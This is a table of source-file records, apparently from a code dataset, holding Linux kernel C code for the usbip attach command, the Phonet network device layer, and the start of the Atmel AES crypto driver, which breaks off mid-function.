repo_name string | path string | copies string | size string | content string | license string |
|---|---|---|---|---|---|
f123h456/linux | tools/usb/usbip/src/usbip_attach.c | 1537 | 4876 | /*
* Copyright (C) 2011 matt mooney <mfm@muteddisk.com>
* 2005-2007 Takahiro Hirofuchi
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include <sys/stat.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <getopt.h>
#include <unistd.h>
#include <errno.h>
#include "vhci_driver.h"
#include "usbip_common.h"
#include "usbip_network.h"
#include "usbip.h"
static const char usbip_attach_usage_string[] =
"usbip attach <args>\n"
" -r, --remote=<host> The machine with exported USB devices\n"
" -b, --busid=<busid> Busid of the device on <host>\n";
/* Print the usage text for the "usbip attach" sub-command to stdout. */
void usbip_attach_usage(void)
{
	fputs("usage: ", stdout);
	fputs(usbip_attach_usage_string, stdout);
}
#define MAX_BUFF 100
/*
 * Persist an attached connection (host, TCP port, busid) to
 * VHCI_STATE_PATH/port<rhport> so that later "usbip port"/"usbip detach"
 * invocations can recover it.
 *
 * Returns 0 on success, -1 on any failure.
 */
static int record_connection(char *host, char *port, char *busid, int rhport)
{
	int fd;
	char path[PATH_MAX+1];
	char buff[MAX_BUFF+1];
	ssize_t nwritten;
	int ret;

	ret = mkdir(VHCI_STATE_PATH, 0700);
	if (ret < 0) {
		/* if VHCI_STATE_PATH exists, then it better be a directory */
		if (errno == EEXIST) {
			struct stat s;

			ret = stat(VHCI_STATE_PATH, &s);
			if (ret < 0)
				return -1;
			/*
			 * Fix: test the full file-type field with S_ISDIR().
			 * The old "st_mode & S_IFDIR" check wrongly accepted
			 * sockets, since S_IFSOCK contains the S_IFDIR bit.
			 */
			if (!S_ISDIR(s.st_mode))
				return -1;
		} else
			return -1;
	}

	snprintf(path, PATH_MAX, VHCI_STATE_PATH"/port%d", rhport);

	fd = open(path, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
	if (fd < 0)
		return -1;

	snprintf(buff, MAX_BUFF, "%s %s %s\n",
			host, port, busid);

	/* write() returns ssize_t; compare like-for-like */
	nwritten = write(fd, buff, strlen(buff));
	if (nwritten != (ssize_t) strlen(buff)) {
		close(fd);
		return -1;
	}

	close(fd);
	return 0;
}
/*
 * Attach the remote device described by @udev to a free vhci port,
 * handing the connected @sockfd over to the kernel driver.
 * Returns the port number on success, -1 on failure.
 */
static int import_device(int sockfd, struct usbip_usb_device *udev)
{
	int ret = -1;
	int port;

	if (usbip_vhci_driver_open() < 0) {
		err("open vhci_driver");
		return -1;
	}

	port = usbip_vhci_get_free_port();
	if (port < 0) {
		err("no free port");
		goto out_close;
	}

	if (usbip_vhci_attach_device(port, sockfd, udev->busnum,
				     udev->devnum, udev->speed) < 0) {
		err("import device");
		goto out_close;
	}

	ret = port;
out_close:
	/* driver handle is closed on every path, success included */
	usbip_vhci_driver_close();
	return ret;
}
/*
 * Run the OP_REQ_IMPORT handshake over @sockfd for @busid and, on a
 * matching reply, hand the socket to the vhci driver.
 * Returns the attached port number, or -1 on any protocol failure.
 */
static int query_import_device(int sockfd, char *busid)
{
	struct op_import_request request;
	struct op_import_reply reply;
	uint16_t code = OP_REP_IMPORT;
	int ret;

	memset(&request, 0, sizeof(request));
	memset(&reply, 0, sizeof(reply));

	/* send a request */
	ret = usbip_net_send_op_common(sockfd, OP_REQ_IMPORT, 0);
	if (ret < 0) {
		err("send op_common");
		return -1;
	}

	strncpy(request.busid, busid, SYSFS_BUS_ID_SIZE-1);

	PACK_OP_IMPORT_REQUEST(0, &request);

	ret = usbip_net_send(sockfd, (void *) &request, sizeof(request));
	if (ret < 0) {
		err("send op_import_request");
		return -1;
	}

	/* receive a reply */
	ret = usbip_net_recv_op_common(sockfd, &code);
	if (ret < 0) {
		err("recv op_common");
		return -1;
	}

	ret = usbip_net_recv(sockfd, (void *) &reply, sizeof(reply));
	if (ret < 0) {
		err("recv op_import_reply");
		return -1;
	}

	PACK_OP_IMPORT_REPLY(0, &reply);

	/* check the reply */
	if (strncmp(reply.udev.busid, busid, SYSFS_BUS_ID_SIZE) != 0) {
		err("recv different busid %s", reply.udev.busid);
		return -1;
	}

	/* import a device */
	return import_device(sockfd, &reply.udev);
}
/*
 * Connect to @host, import the device identified by @busid, and record
 * the resulting connection for later detach.
 * Returns 0 on success, -1 on failure.
 */
static int attach_device(char *host, char *busid)
{
	int sockfd;
	int rc;
	int rhport;

	sockfd = usbip_net_tcp_connect(host, usbip_port_string);
	if (sockfd < 0) {
		err("tcp connect");
		return -1;
	}

	rhport = query_import_device(sockfd, busid);
	if (rhport < 0) {
		err("query");
		/* fix: the socket was leaked on this error path */
		close(sockfd);
		return -1;
	}

	/* the kernel now owns its own reference to the connection */
	close(sockfd);

	rc = record_connection(host, usbip_port_string, busid, rhport);
	if (rc < 0) {
		err("record connection");
		return -1;
	}

	return 0;
}
/*
 * Entry point for "usbip attach": parse -r/--remote and -b/--busid,
 * then attach the requested remote device.  Prints usage and returns
 * -1 on bad arguments.
 */
int usbip_attach(int argc, char *argv[])
{
	static const struct option opts[] = {
		{ "remote", required_argument, NULL, 'r' },
		{ "busid", required_argument, NULL, 'b' },
		{ NULL, 0, NULL, 0 }
	};
	char *host = NULL;
	char *busid = NULL;
	int opt;
	int ret = -1;

	while ((opt = getopt_long(argc, argv, "r:b:", opts, NULL)) != -1) {
		switch (opt) {
		case 'r':
			host = optarg;
			break;
		case 'b':
			busid = optarg;
			break;
		default:
			goto err_out;
		}
	}

	/* both options are mandatory */
	if (!host || !busid)
		goto err_out;

	ret = attach_device(host, busid);
	goto out;

err_out:
	usbip_attach_usage();
out:
	return ret;
}
| gpl-2.0 |
daishi4u/J7_Afterburner | net/phonet/pn_dev.c | 2049 | 10103 | /*
* File: pn_dev.c
*
* Phonet network device
*
* Copyright (C) 2008 Nokia Corporation.
*
* Authors: Sakari Ailus <sakari.ailus@nokia.com>
* Rémi Denis-Courmont
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA
*/
#include <linux/kernel.h>
#include <linux/net.h>
#include <linux/slab.h>
#include <linux/netdevice.h>
#include <linux/phonet.h>
#include <linux/proc_fs.h>
#include <linux/if_arp.h>
#include <net/sock.h>
#include <net/netns/generic.h>
#include <net/phonet/pn_dev.h>
/* Per-namespace Phonet routing table: one slot per (address >> 2),
 * i.e. 64 entries.  Writers hold @lock; readers use RCU. */
struct phonet_routes {
	struct mutex lock;
	struct net_device *table[64];
};

/* All per-namespace Phonet state; allocated by the pernet core
 * (see phonet_net_ops.size) and fetched with net_generic(). */
struct phonet_net {
	struct phonet_device_list pndevs;	/* devices + their addresses */
	struct phonet_routes routes;		/* destination -> device map */
};

/* net_generic() id for this subsystem's per-namespace data. */
static int phonet_net_id __read_mostly;
static struct phonet_net *phonet_pernet(struct net *net)
{
BUG_ON(!net);
return net_generic(net, phonet_net_id);
}
struct phonet_device_list *phonet_device_list(struct net *net)
{
struct phonet_net *pnn = phonet_pernet(net);
return &pnn->pndevs;
}
/* Allocate new Phonet device state for @dev and link it into the
 * per-namespace list.  Caller must hold pndevs->lock. */
static struct phonet_device *__phonet_device_alloc(struct net_device *dev)
{
	struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
	struct phonet_device *pnd;

	BUG_ON(!mutex_is_locked(&pndevs->lock));

	pnd = kmalloc(sizeof(*pnd), GFP_ATOMIC);
	if (!pnd)
		return NULL;

	pnd->netdev = dev;
	bitmap_zero(pnd->addrs, 64);
	list_add_rcu(&pnd->list, &pndevs->list);
	return pnd;
}
static struct phonet_device *__phonet_get(struct net_device *dev)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd;
BUG_ON(!mutex_is_locked(&pndevs->lock));
list_for_each_entry(pnd, &pndevs->list, list) {
if (pnd->netdev == dev)
return pnd;
}
return NULL;
}
static struct phonet_device *__phonet_get_rcu(struct net_device *dev)
{
struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
struct phonet_device *pnd;
list_for_each_entry_rcu(pnd, &pndevs->list, list) {
if (pnd->netdev == dev)
return pnd;
}
return NULL;
}
/*
 * Tear down the Phonet state of an unregistering device: unlink it from
 * the per-namespace list, emit an RTM_DELADDR notification for every
 * address it carried, and free it.  Runs under RTNL (netdev notifier).
 */
static void phonet_device_destroy(struct net_device *dev)
{
	struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
	struct phonet_device *pnd;

	ASSERT_RTNL();

	mutex_lock(&pndevs->lock);
	pnd = __phonet_get(dev);
	if (pnd)
		list_del_rcu(&pnd->list);
	mutex_unlock(&pndevs->lock);

	if (pnd) {
		u8 addr;

		/* one notification per address bit still set */
		for_each_set_bit(addr, pnd->addrs, 64)
			phonet_address_notify(RTM_DELADDR, dev, addr);
		/* NOTE(review): freed without an explicit RCU grace period,
		 * unlike phonet_address_del() which uses kfree_rcu() —
		 * presumably safe in this unregister path; verify. */
		kfree(pnd);
	}
}
/*
 * Return the first registered and administratively-up Phonet device in
 * @net, with a reference taken via dev_hold(), or NULL if there is
 * none.  The caller must dev_put() the returned device.
 */
struct net_device *phonet_device_get(struct net *net)
{
	struct phonet_device_list *pndevs = phonet_device_list(net);
	struct phonet_device *pnd;
	struct net_device *dev = NULL;

	rcu_read_lock();
	list_for_each_entry_rcu(pnd, &pndevs->list, list) {
		dev = pnd->netdev;
		BUG_ON(!dev);

		/* skip devices that are unregistering or down */
		if ((dev->reg_state == NETREG_REGISTERED) &&
			((pnd->netdev->flags & IFF_UP)) == IFF_UP)
			break;
		dev = NULL;
	}
	/* take the reference inside the RCU section, before the device
	 * could go away */
	if (dev)
		dev_hold(dev);
	rcu_read_unlock();
	return dev;
}
/*
 * Add Phonet address @addr to @dev, creating the per-device state on
 * first use.  Returns 0, -ENOMEM, or -EEXIST if already configured.
 */
int phonet_address_add(struct net_device *dev, u8 addr)
{
	struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
	struct phonet_device *pnd;
	int err;

	mutex_lock(&pndevs->lock);
	/* Find or create Phonet-specific device data */
	pnd = __phonet_get(dev);
	if (pnd == NULL)
		pnd = __phonet_device_alloc(dev);

	if (unlikely(pnd == NULL))
		err = -ENOMEM;
	else if (test_and_set_bit(addr >> 2, pnd->addrs))
		err = -EEXIST;
	else
		err = 0;
	mutex_unlock(&pndevs->lock);
	return err;
}
/*
 * Remove Phonet address @addr from @dev.  If this was the device's last
 * address, its phonet_device node is unlinked and freed after an RCU
 * grace period.  Returns 0 or -EADDRNOTAVAIL.
 */
int phonet_address_del(struct net_device *dev, u8 addr)
{
	struct phonet_device_list *pndevs = phonet_device_list(dev_net(dev));
	struct phonet_device *pnd;
	int err = 0;

	mutex_lock(&pndevs->lock);
	pnd = __phonet_get(dev);
	if (!pnd || !test_and_clear_bit(addr >> 2, pnd->addrs)) {
		err = -EADDRNOTAVAIL;
		pnd = NULL;	/* nothing to free */
	} else if (bitmap_empty(pnd->addrs, 64))
		list_del_rcu(&pnd->list);	/* last address: drop node */
	else
		pnd = NULL;	/* still has addresses: keep node */
	mutex_unlock(&pndevs->lock);

	/* deferred free: RCU readers may still be traversing the list */
	if (pnd)
		kfree_rcu(pnd, rcu);

	return err;
}
/* Gets a source address toward a destination, through a interface.
 *
 * Prefers @daddr itself if it is local to @dev, else the device's first
 * configured address, else falls back to the namespace's default device
 * (the recursion is bounded: the fallback device resolves locally).
 * Returns PN_NO_ADDR when no usable address exists.
 */
u8 phonet_address_get(struct net_device *dev, u8 daddr)
{
	struct phonet_device *pnd;
	u8 saddr;

	rcu_read_lock();
	pnd = __phonet_get_rcu(dev);
	if (pnd) {
		BUG_ON(bitmap_empty(pnd->addrs, 64));

		/* Use same source address as destination, if possible */
		if (test_bit(daddr >> 2, pnd->addrs))
			saddr = daddr;
		else
			saddr = find_first_bit(pnd->addrs, 64) << 2;
	} else
		saddr = PN_NO_ADDR;
	rcu_read_unlock();

	if (saddr == PN_NO_ADDR) {
		/* Fallback to another device */
		struct net_device *def_dev;

		def_dev = phonet_device_get(dev_net(dev));
		if (def_dev) {
			/* avoid self-recursion on the same device */
			if (def_dev != dev)
				saddr = phonet_address_get(def_dev, daddr);
			dev_put(def_dev);
		}
	}
	return saddr;
}
/*
 * Test whether @addr is configured on any usable (registered and up)
 * device in @net.  Returns 0 if so, -EADDRNOTAVAIL otherwise.
 */
int phonet_address_lookup(struct net *net, u8 addr)
{
	struct phonet_device_list *pndevs = phonet_device_list(net);
	struct phonet_device *pnd;
	int err = -EADDRNOTAVAIL;

	rcu_read_lock();
	list_for_each_entry_rcu(pnd, &pndevs->list, list) {
		/* Don't allow unregistering devices! */
		if ((pnd->netdev->reg_state != NETREG_REGISTERED) ||
				((pnd->netdev->flags & IFF_UP)) != IFF_UP)
			continue;

		if (test_bit(addr >> 2, pnd->addrs)) {
			err = 0;
			break;
		}
	}
	rcu_read_unlock();
	return err;
}
/* automatically configure a Phonet device, if supported */
static int phonet_device_autoconf(struct net_device *dev)
{
struct if_phonet_req req;
int ret;
if (!dev->netdev_ops->ndo_do_ioctl)
return -EOPNOTSUPP;
ret = dev->netdev_ops->ndo_do_ioctl(dev, (struct ifreq *)&req,
SIOCPNGAUTOCONF);
if (ret < 0)
return ret;
ASSERT_RTNL();
ret = phonet_address_add(dev, req.ifr_phonet_autoconf.device);
if (ret)
return ret;
phonet_address_notify(RTM_NEWADDR, dev,
req.ifr_phonet_autoconf.device);
return 0;
}
/*
 * Drop every route that points at an unregistering device.  Routes are
 * cleared under the routes mutex, then — after an RCU grace period so
 * no reader still holds the stale pointers — one RTM_DELROUTE
 * notification and one dev_put() (balancing phonet_route_add()'s
 * dev_hold()) is issued per deleted route.
 */
static void phonet_route_autodel(struct net_device *dev)
{
	struct phonet_net *pnn = phonet_pernet(dev_net(dev));
	unsigned int i;
	DECLARE_BITMAP(deleted, 64);

	/* Remove left-over Phonet routes */
	bitmap_zero(deleted, 64);
	mutex_lock(&pnn->routes.lock);
	for (i = 0; i < 64; i++)
		if (dev == pnn->routes.table[i]) {
			RCU_INIT_POINTER(pnn->routes.table[i], NULL);
			set_bit(i, deleted);
		}
	mutex_unlock(&pnn->routes.lock);

	if (bitmap_empty(deleted, 64))
		return; /* short-circuit RCU */
	synchronize_rcu();
	for_each_set_bit(i, deleted, 64) {
		rtm_phonet_notify(RTM_DELROUTE, dev, i);
		dev_put(dev);
	}
}
/* notify Phonet of device events */
static int phonet_device_notify(struct notifier_block *me, unsigned long what,
				void *arg)
{
	struct net_device *dev = arg;

	if (what == NETDEV_REGISTER) {
		/* only Phonet-type interfaces are auto-configured */
		if (dev->type == ARPHRD_PHONET)
			phonet_device_autoconf(dev);
	} else if (what == NETDEV_UNREGISTER) {
		phonet_device_destroy(dev);
		phonet_route_autodel(dev);
	}
	return 0;
}
/* Hooks phonet_device_notify() into netdevice register/unregister
 * events at default priority. */
static struct notifier_block phonet_device_notifier = {
	.notifier_call = phonet_device_notify,
	.priority = 0,
};
/* Per-namespace Phonet devices handling */
static int __net_init phonet_init_net(struct net *net)
{
	struct phonet_net *pnn = phonet_pernet(net);

	/* Initialize per-namespace state BEFORE publishing the proc
	 * entry: once /proc/net/phonet exists, its seq handlers may run
	 * and must never observe an uninitialized list head or mutex. */
	INIT_LIST_HEAD(&pnn->pndevs.list);
	mutex_init(&pnn->pndevs.lock);
	mutex_init(&pnn->routes.lock);

	if (!proc_create("phonet", 0, net->proc_net, &pn_sock_seq_fops))
		return -ENOMEM;

	return 0;
}
/* Per-namespace teardown: remove the /proc/net/phonet entry created by
 * phonet_init_net(). */
static void __net_exit phonet_exit_net(struct net *net)
{
	remove_proc_entry("phonet", net->proc_net);
}
/* Namespace lifecycle hooks; .size makes the pernet core allocate one
 * struct phonet_net per namespace, keyed by phonet_net_id. */
static struct pernet_operations phonet_net_ops = {
	.init = phonet_init_net,
	.exit = phonet_exit_net,
	.id = &phonet_net_id,
	.size = sizeof(struct phonet_net),
};
/* Initialize Phonet devices list */
int __init phonet_device_init(void)
{
	int err = register_pernet_subsys(&phonet_net_ops);

	if (err)
		return err;

	/* The "pnresource" entry is diagnostic only: warn rather than
	 * fail module init if it cannot be created (the return value was
	 * previously ignored silently). */
	if (!proc_create("pnresource", 0, init_net.proc_net,
			 &pn_res_seq_fops))
		pr_warn("phonet: cannot create /proc/net/pnresource\n");

	register_netdevice_notifier(&phonet_device_notifier);
	err = phonet_netlink_register();
	if (err)
		phonet_device_exit();	/* full unwind on failure */
	return err;
}
/* Module teardown: mirror of phonet_device_init(), in reverse order of
 * registration. */
void phonet_device_exit(void)
{
	rtnl_unregister_all(PF_PHONET);
	unregister_netdevice_notifier(&phonet_device_notifier);
	unregister_pernet_subsys(&phonet_net_ops);
	remove_proc_entry("pnresource", init_net.proc_net);
}
/*
 * Install a route to @daddr through @dev, taking a device reference.
 * Returns 0, or -EEXIST if the slot is already occupied.
 */
int phonet_route_add(struct net_device *dev, u8 daddr)
{
	struct phonet_net *pnn = phonet_pernet(dev_net(dev));
	struct phonet_routes *routes = &pnn->routes;
	int err = 0;

	daddr = daddr >> 2;
	mutex_lock(&routes->lock);
	if (routes->table[daddr] != NULL)
		err = -EEXIST;
	else {
		rcu_assign_pointer(routes->table[daddr], dev);
		dev_hold(dev);
	}
	mutex_unlock(&routes->lock);
	return err;
}
/*
 * Remove the route to @daddr if (and only if) it currently points at
 * @dev.  Waits for an RCU grace period before dropping the device
 * reference, so concurrent readers never use a stale pointer.
 * Returns 0, or -ENOENT when the route belongs to another device.
 */
int phonet_route_del(struct net_device *dev, u8 daddr)
{
	struct phonet_net *pnn = phonet_pernet(dev_net(dev));
	struct phonet_routes *routes = &pnn->routes;

	daddr = daddr >> 2;	/* table is indexed by address >> 2 */
	mutex_lock(&routes->lock);
	if (dev == routes->table[daddr])
		RCU_INIT_POINTER(routes->table[daddr], NULL);
	else
		dev = NULL;	/* slot owned by a different device */
	mutex_unlock(&routes->lock);

	if (!dev)
		return -ENOENT;
	synchronize_rcu();	/* let readers of the old pointer drain */
	dev_put(dev);
	return 0;
}
/* RCU-protected route lookup; caller must be in an RCU read section
 * and must not keep the pointer past it without a reference. */
struct net_device *phonet_route_get_rcu(struct net *net, u8 daddr)
{
	struct phonet_net *pnn = phonet_pernet(net);

	return rcu_dereference(pnn->routes.table[daddr >> 2]);
}
/*
 * Resolve the output device for @daddr, falling back to the
 * namespace's default device.  A reference is held on the result;
 * the caller must dev_put() it.
 */
struct net_device *phonet_route_output(struct net *net, u8 daddr)
{
	struct phonet_net *pnn = phonet_pernet(net);
	struct net_device *dev;

	rcu_read_lock();
	dev = rcu_dereference(pnn->routes.table[daddr >> 2]);
	if (dev)
		dev_hold(dev);
	rcu_read_unlock();

	if (dev == NULL)
		dev = phonet_device_get(net); /* Default route */
	return dev;
}
| gpl-2.0 |
maxwen/android_kernel_oppo_msm8916_orig | drivers/crypto/atmel-aes.c | 2305 | 34345 | /*
* Cryptographic API.
*
* Support for ATMEL AES HW acceleration.
*
* Copyright (c) 2012 Eukréa Electromatique - ATMEL
* Author: Nicolas Royer <nicolas@eukrea.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*
* Some ideas are from omap-aes.c driver.
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/err.h>
#include <linux/clk.h>
#include <linux/io.h>
#include <linux/hw_random.h>
#include <linux/platform_device.h>
#include <linux/device.h>
#include <linux/init.h>
#include <linux/errno.h>
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/scatterlist.h>
#include <linux/dma-mapping.h>
#include <linux/delay.h>
#include <linux/crypto.h>
#include <linux/cryptohash.h>
#include <crypto/scatterwalk.h>
#include <crypto/algapi.h>
#include <crypto/aes.h>
#include <crypto/hash.h>
#include <crypto/internal/hash.h>
#include <linux/platform_data/crypto-atmel.h>
#include "atmel-aes-regs.h"
#define CFB8_BLOCK_SIZE 1
#define CFB16_BLOCK_SIZE 2
#define CFB32_BLOCK_SIZE 4
#define CFB64_BLOCK_SIZE 8
/* AES flags */
#define AES_FLAGS_MODE_MASK 0x03ff
#define AES_FLAGS_ENCRYPT BIT(0)
#define AES_FLAGS_CBC BIT(1)
#define AES_FLAGS_CFB BIT(2)
#define AES_FLAGS_CFB8 BIT(3)
#define AES_FLAGS_CFB16 BIT(4)
#define AES_FLAGS_CFB32 BIT(5)
#define AES_FLAGS_CFB64 BIT(6)
#define AES_FLAGS_CFB128 BIT(7)
#define AES_FLAGS_OFB BIT(8)
#define AES_FLAGS_CTR BIT(9)
#define AES_FLAGS_INIT BIT(16)
#define AES_FLAGS_DMA BIT(17)
#define AES_FLAGS_BUSY BIT(18)
#define AES_FLAGS_FAST BIT(19)
#define ATMEL_AES_QUEUE_LENGTH 50
#define ATMEL_AES_DMA_THRESHOLD 16
/* Hardware capabilities, derived from the IP revision at probe time. */
struct atmel_aes_caps {
	bool has_dualbuff;	/* dual input buffer (AES_MR_DUALBUFF) */
	bool has_cfb64;	/* CFB with 64-bit segments supported */
	u32 max_burst_size;	/* DMA maxburst for non-CFB transfers */
};
struct atmel_aes_dev;
/* Per-transform (tfm) context: key material and mode block size. */
struct atmel_aes_ctx {
	struct atmel_aes_dev *dd;	/* device the tfm is bound to */
	int keylen;	/* key length in bytes */
	u32 key[AES_KEYSIZE_256 / sizeof(u32)];
	u16 block_size;	/* alignment unit of the current mode */
};
/* Per-request context: mode flags requested by the caller. */
struct atmel_aes_reqctx {
	unsigned long mode;
};
/* One DMA channel and its slave configuration. */
struct atmel_aes_dma {
	struct dma_chan *chan;
	struct dma_slave_config dma_conf;
};
/* One AES hardware instance and the state of its in-flight request. */
struct atmel_aes_dev {
	struct list_head list;	/* link in atmel_aes.dev_list */
	unsigned long phys_base;	/* physical register base (for DMA) */
	void __iomem *io_base;	/* mapped register base */
	struct atmel_aes_ctx *ctx;	/* ctx of the current request */
	struct device *dev;
	struct clk *iclk;	/* interface clock */
	int irq;
	unsigned long flags;	/* AES_FLAGS_* state/mode bits */
	int err;
	spinlock_t lock;	/* protects queue and flags */
	struct crypto_queue queue;	/* pending requests */
	struct tasklet_struct done_task;
	struct tasklet_struct queue_task;
	struct ablkcipher_request *req;	/* request being processed */
	size_t total;	/* bytes still to process */
	/* input scatterlist cursor */
	struct scatterlist *in_sg;
	unsigned int nb_in_sg;
	size_t in_offset;
	/* output scatterlist cursor */
	struct scatterlist *out_sg;
	unsigned int nb_out_sg;
	size_t out_offset;
	size_t bufcnt;
	size_t buflen;	/* usable size of the bounce buffers */
	size_t dma_size;	/* length of the in-flight DMA transfer */
	/* bounce buffer towards the device */
	void *buf_in;
	int dma_in;
	dma_addr_t dma_addr_in;
	struct atmel_aes_dma dma_lch_in;
	/* bounce buffer from the device */
	void *buf_out;
	int dma_out;
	dma_addr_t dma_addr_out;
	struct atmel_aes_dma dma_lch_out;
	struct atmel_aes_caps caps;
	u32 hw_version;
};
/* Global registry of probed AES instances. */
struct atmel_aes_drv {
	struct list_head dev_list;
	spinlock_t lock;	/* protects dev_list and ctx->dd binding */
};
static struct atmel_aes_drv atmel_aes = {
	.dev_list = LIST_HEAD_INIT(atmel_aes.dev_list),
	.lock = __SPIN_LOCK_UNLOCKED(atmel_aes.lock),
};
/*
 * Count the scatterlist entries needed to cover req->nbytes bytes
 * starting at @sg; the final, possibly partial, entry is included.
 * (Removed a redundant second assignment of the byte counter.)
 */
static int atmel_aes_sg_length(struct ablkcipher_request *req,
			struct scatterlist *sg)
{
	unsigned int total = req->nbytes;
	unsigned int len;
	struct scatterlist *sg_list = sg;
	int sg_nb = 0;

	while (sg_list && total) {
		len = min(sg_list->length, total);
		sg_nb++;
		total -= len;
		sg_list = sg_next(sg_list);
	}

	return sg_nb;
}
/*
 * Stream up to min(@buflen, @total) bytes between a scatterlist and a
 * linear buffer, advancing the scatterlist cursor (*sg, *offset) as it
 * goes.  @out == 0 copies scatterlist -> buffer; @out != 0 copies
 * buffer -> scatterlist (scatterwalk_map_and_copy() semantics).
 * Returns the number of bytes actually copied.
 */
static int atmel_aes_sg_copy(struct scatterlist **sg, size_t *offset,
			void *buf, size_t buflen, size_t total, int out)
{
	unsigned int count, off = 0;

	while (buflen && total) {
		/* bytes left in the current entry, capped by both limits */
		count = min((*sg)->length - *offset, total);
		count = min(count, buflen);

		if (!count)
			return off;

		scatterwalk_map_and_copy(buf + off, *sg, *offset, count, out);

		off += count;
		buflen -= count;
		*offset += count;
		total -= count;

		/* entry exhausted: step to the next one, or stop at end */
		if (*offset == (*sg)->length) {
			*sg = sg_next(*sg);
			if (*sg)
				*offset = 0;
			else
				total = 0;
		}
	}

	return off;
}
/* Read one 32-bit AES register at byte @offset from the register base. */
static inline u32 atmel_aes_read(struct atmel_aes_dev *dd, u32 offset)
{
	return readl_relaxed(dd->io_base + offset);
}

/* Write one 32-bit AES register at byte @offset. */
static inline void atmel_aes_write(struct atmel_aes_dev *dd,
					u32 offset, u32 value)
{
	writel_relaxed(value, dd->io_base + offset);
}

/* Read @count consecutive 32-bit registers into @value. */
static void atmel_aes_read_n(struct atmel_aes_dev *dd, u32 offset,
					u32 *value, int count)
{
	for (; count--; value++, offset += 4)
		*value = atmel_aes_read(dd, offset);
}

/* Write @count consecutive 32-bit registers from @value. */
static void atmel_aes_write_n(struct atmel_aes_dev *dd, u32 offset,
					u32 *value, int count)
{
	for (; count--; value++, offset += 4)
		atmel_aes_write(dd, offset, *value);
}
/*
 * Bind @ctx to an AES instance: reuse the one it is already bound to,
 * otherwise pick the first probed device (sticky for the ctx lifetime).
 * Returns NULL if no device has been probed.
 */
static struct atmel_aes_dev *atmel_aes_find_dev(struct atmel_aes_ctx *ctx)
{
	struct atmel_aes_dev *dd;

	spin_lock_bh(&atmel_aes.lock);
	dd = ctx->dd;
	if (dd == NULL) {
		struct atmel_aes_dev *tmp;

		list_for_each_entry(tmp, &atmel_aes.dev_list, list) {
			dd = tmp;
			break;	/* first registered device wins */
		}
		ctx->dd = dd;
	}
	spin_unlock_bh(&atmel_aes.lock);

	return dd;
}
/*
 * Enable the interface clock and, on first use, soft-reset the block
 * and select the key-clock divider.  Returns 0 or a clock error.
 */
static int atmel_aes_hw_init(struct atmel_aes_dev *dd)
{
	int err;

	/* clk_prepare_enable() can fail; previously the return value was
	 * ignored and the IP would be touched with its clock off. */
	err = clk_prepare_enable(dd->iclk);
	if (err)
		return err;

	if (!(dd->flags & AES_FLAGS_INIT)) {
		atmel_aes_write(dd, AES_CR, AES_CR_SWRST);
		atmel_aes_write(dd, AES_MR, 0xE << AES_MR_CKEY_OFFSET);
		dd->flags |= AES_FLAGS_INIT;
		dd->err = 0;
	}

	return 0;
}
/* Read the 12-bit hardware revision from the version register. */
static inline unsigned int atmel_aes_get_version(struct atmel_aes_dev *dd)
{
	return atmel_aes_read(dd, AES_HW_VERSION) & 0x00000fff;
}

/* Probe-time helper: power the block up just long enough to latch and
 * log its hardware revision (used later to fill dd->caps). */
static void atmel_aes_hw_version_init(struct atmel_aes_dev *dd)
{
	atmel_aes_hw_init(dd);

	dd->hw_version = atmel_aes_get_version(dd);

	dev_info(dd->dev,
			"version: 0x%x\n", dd->hw_version);

	clk_disable_unprepare(dd->iclk);
}
/* Complete the current request: gate the clock, clear BUSY, and invoke
 * the caller's completion callback with @err. */
static void atmel_aes_finish_req(struct atmel_aes_dev *dd, int err)
{
	struct ablkcipher_request *req = dd->req;

	clk_disable_unprepare(dd->iclk);
	dd->flags &= ~AES_FLAGS_BUSY;

	req->base.complete(&req->base, err);
}

/* Output-channel DMA completion: defer the heavy lifting to the done
 * tasklet (we are in callback context here). */
static void atmel_aes_dma_callback(void *data)
{
	struct atmel_aes_dev *dd = data;

	/* dma_lch_out - completed */
	tasklet_schedule(&dd->done_task);
}
/*
 * Program both DMA channels for one transfer of @length bytes:
 * memory -> AES input registers and AES output registers -> memory.
 * Bus widths and bursts depend on the CFB sub-mode, since the hardware
 * consumes 1-, 2- or 4-byte quanta in CFB8/CFB16/other modes.
 * Returns 0 on success, -EINVAL if descriptor preparation fails.
 */
static int atmel_aes_crypt_dma(struct atmel_aes_dev *dd,
		dma_addr_t dma_addr_in, dma_addr_t dma_addr_out, int length)
{
	struct scatterlist sg[2];
	struct dma_async_tx_descriptor *in_desc, *out_desc;

	dd->dma_size = length;

	if (!(dd->flags & AES_FLAGS_FAST)) {
		/* bounce-buffer path: the CPU just filled buf_in, make it
		 * visible to the device before starting the transfer */
		dma_sync_single_for_device(dd->dev, dma_addr_in, length,
					   DMA_TO_DEVICE);
	}

	/* narrow the bus width to match the CFB segment size */
	if (dd->flags & AES_FLAGS_CFB8) {
		dd->dma_lch_in.dma_conf.dst_addr_width =
			DMA_SLAVE_BUSWIDTH_1_BYTE;
		dd->dma_lch_out.dma_conf.src_addr_width =
			DMA_SLAVE_BUSWIDTH_1_BYTE;
